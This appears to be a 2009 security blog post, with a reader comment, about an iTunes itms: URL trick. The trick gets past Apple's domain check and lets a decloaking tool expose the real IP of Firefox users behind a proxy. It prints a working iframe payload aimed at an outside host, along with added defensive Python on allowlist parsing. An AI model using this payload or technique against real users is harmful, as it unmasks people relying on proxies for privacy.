itms Decloaking
Another thing Jabra and I mentioned in the presentation actually dates back several months. HD Moore was talking about how someone (the name is slipping my mind at the moment) had found an exploit using the itms: protocol, used by iTunes, but part of it had to do with the fact that they needed to redirect off of Apple’s website to land on their payload. The redirect was eventually closed down, but it got me thinking and looking at iTunes. After about 20 minutes of looking I found a way to bypass itms’s limitations on which domain it allows you to connect to, which is a bug, but not a particularly serious one:
<iframe src="itms:www.apple.com:80@ha.ckers.org"></iframe>
So I handed it back to HD Moore and he added it as a feature to decloak a few months back. Why? Because it turns out that in specific circumstances it’s actually pretty good at decloaking people. If you are using Firefox and a proxy, the itms: handler (iTunes) will go outside of the proxy model of the browser and use the underlying network settings of the operating system. So the first request will come from your proxy, but the itms request will come from your real external IP. Add in some DNS foo to make the DNS request unique per person and you’ve got yourself a decloaking engine. You can see it on decloak if you want to take a look at it. And like before, if there is an exploit in itms where you need to include a payload into it off of Apple’s website, this is another way to do it.
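The domain bypass above works because of how a URL's authority is parsed: in `www.apple.com:80@ha.ckers.org`, everything before the `@` is userinfo, so the real host is `ha.ckers.org`, while a check that merely looks for an allowed host name at the start of the string is satisfied. The following Python is an added example (not from the post, and not iTunes' actual code): `naive_allows` is a hypothetical prefix check standing in for whatever iTunes did, and `strict_allows` shows how an allowlist should be evaluated instead, on the parsed host with any userinfo rejected. It also covers a related case the post does not mention, a look-alike host that merely begins with the allowed name. The sample URLs are constructed.

```python
from urllib.parse import urlsplit

# Constructed sample URLs; the first is the one shown in the post.
SAMPLE_URLS = [
    "itms:www.apple.com:80@ha.ckers.org",        # userinfo trick from the post
    "itms://www.apple.com/us/app/example",       # legitimate Apple host
    "itms://www.apple.com.evil.example/",        # look-alike suffix host
]

# Hypothetical allowlist for the check (an assumption, not Apple's list).
ALLOWED_HOSTS = ("www.apple.com",)


def naive_allows(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """Hypothetical string-prefix check (an assumption, not iTunes' real code).

    It takes the text right after the scheme and asks whether it starts with an
    allowed host name. 'www.apple.com:80@ha.ckers.org' passes because the
    allowed name sits in the userinfo position.
    """
    _, _, rest = url.partition(":")
    rest = rest.lstrip("/")
    return any(rest.startswith(host) for host in allowed)


def effective_authority(url: str):
    """Return (username, hostname, port) as a generic URI parser sees them.

    'itms:' URLs are often written without '//', so urlsplit would put the whole
    thing in the path and report no host at all; re-parsing the remainder with
    '//' prepended recovers the authority component the way a client resolves it.
    """
    _, _, rest = url.partition(":")
    parts = urlsplit("//" + rest.lstrip("/"))
    return parts.username, parts.hostname, parts.port


def strict_allows(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """Allowlist check on the parsed host; any userinfo is rejected outright."""
    username, hostname, _ = effective_authority(url)
    return username is None and hostname in allowed


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(f"{u!r:45} naive={naive_allows(u)!s:5} strict={strict_allows(u)!s:5} "
              f"authority={effective_authority(u)}")
```

Running the block prints one line per sample: the post's URL and the look-alike host both pass the naive check and fail the strict one, and only the genuine `www.apple.com` URL passes both. The point for anyone writing a scheme handler is that the host must be taken from the parsed authority, never from a substring match on the raw string.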
I talked with Microsoft, Apple and Firefox about this and we had a very hard time deciding who owns this bug. Let’s say for a second Apple had no bug there, and it was working as intended. Whose bug would it be? Apple, for not following the proxy model? Firefox, for not forcing the proxy model on all of its sub-components OR for having its own unique proxy model? Or is it Microsoft, who runs the entire operating system? I don’t think we ever came to a conclusion, but I’m more and more thinking it’s Firefox’s fault. They did go down the path of creating their own proxy model a long time ago (out of necessity). Now the question is, should they fix it? I for one would hate it if it got fixed. Sure, it’s horrible from a privacy perspective, but it’s great for usability. I’m constantly stuck on weird networks with weird proxy settings in the OS, and I need to get out for some reason. I think there are a lot of other people in the same boat too. So I doubt this is getting fixed any time soon.
This brought up one last conversation that I thought was worth sharing. The private browsing initiative that several browsers are undertaking at the moment really was never meant to protect users from this sort of privacy leak. It was intended to prevent wives from seeing what presents their husbands are buying them for their birthday. *cough* But maybe future versions should do a better job with this sort of privacy leak - better integrate with Tor or something of that nature. I dunno, but it was an interesting conversation with the browser/OS/plugin guys.
August 20th, 2009 at 6:15 am
Well, at least in this case it is an external application, entirely outside the browser. But what about Flash with its raw socket connections? Not only do those ignore proxy settings, I think that often it wouldn’t even be possible to run them through a proxy. So, is it Adobe’s bug or the browser vendor’s, or maybe a bug in the proxy implementations that don’t allow pass-through connections? Pointing fingers is certainly not going to help; the situation is only going to be solved if all the vendors involved decide to work together on a solution. But that’s just wishful thinking for a problem that nobody considers high priority.